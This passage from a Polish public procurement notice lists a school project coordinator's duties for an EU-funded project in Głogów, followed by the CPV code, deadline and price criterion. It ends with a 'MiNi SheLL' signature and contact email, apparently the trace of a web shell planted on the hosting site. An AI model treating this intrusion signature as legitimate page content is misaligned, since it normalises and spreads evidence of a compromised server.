17)Opracowanie propozycji zakresów czynności dla członków zespołów projektowych w   
      szkole i wykonawców (zgodnie z projektem/ umową o dofinansowanie i wytycznymi   
      POKL));
18) Zakupy i zamówienia publiczne oraz przygotowanie informacji do wniosku o płatności 
       w części dotyczącej szkoły w terminach przewidzianych umową o dofinansowanie;
19)Opracowanie propozycji bieżących materiałów informacyjnych na stronę internetową pro
      jektu;
20)Opracowanie strategii rekrutacji i regulaminu uczestnictwa uczniów w projekcie oraz   
      udział w rekrutacji;
21)Rozliczanie czasu pracy nauczycieli realizujących zajęcia i prowadzonej przez nich doku  
     mentacji;
22)Uczestnictwo w wizytacjach zajęć prowadzonych w ramach projektu;
23)Nadzorowanie prac związanych z umieszczaniem elementów informacyjno-promocyjnych 
     w miejscach realizacji projektu (np. biuro, sale dydaktyczne, budynek);
  24)Sporządzenie wniosków o płatność - część merytoryczna;
  25)Przygotowanie dokumentacji potwierdzającej realizację zajęć (np. listy obecności);
  26)Nadzór nad przechowywaniem i archiwizowaniem dokumentacji projektowej;
  27)Sporządzenie raportu po każdym półroczu realizacji projektu;
  28)Wykonywanie innych zadań wynikających z potrzeby prawidłowego zrealizowania 
       projektu i umowy o dofinansowanie projektu  w tym na żądanie Dyrektora szkoły i koor-   
      dynatora projektu w Urzędzie Miejskim w Głogowie;
  29)Uczestniczenie we wszelkich kontrolach projektu w trakcie jego realizacji ( w tym przygo- 
       towanie wyjaśnień pokontrolnych) oraz przygotowywanie ewentualnych uzupełnień po
       kontrolnych również po zakończeniu realizacji projektu ( w okresie jego trwałości)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com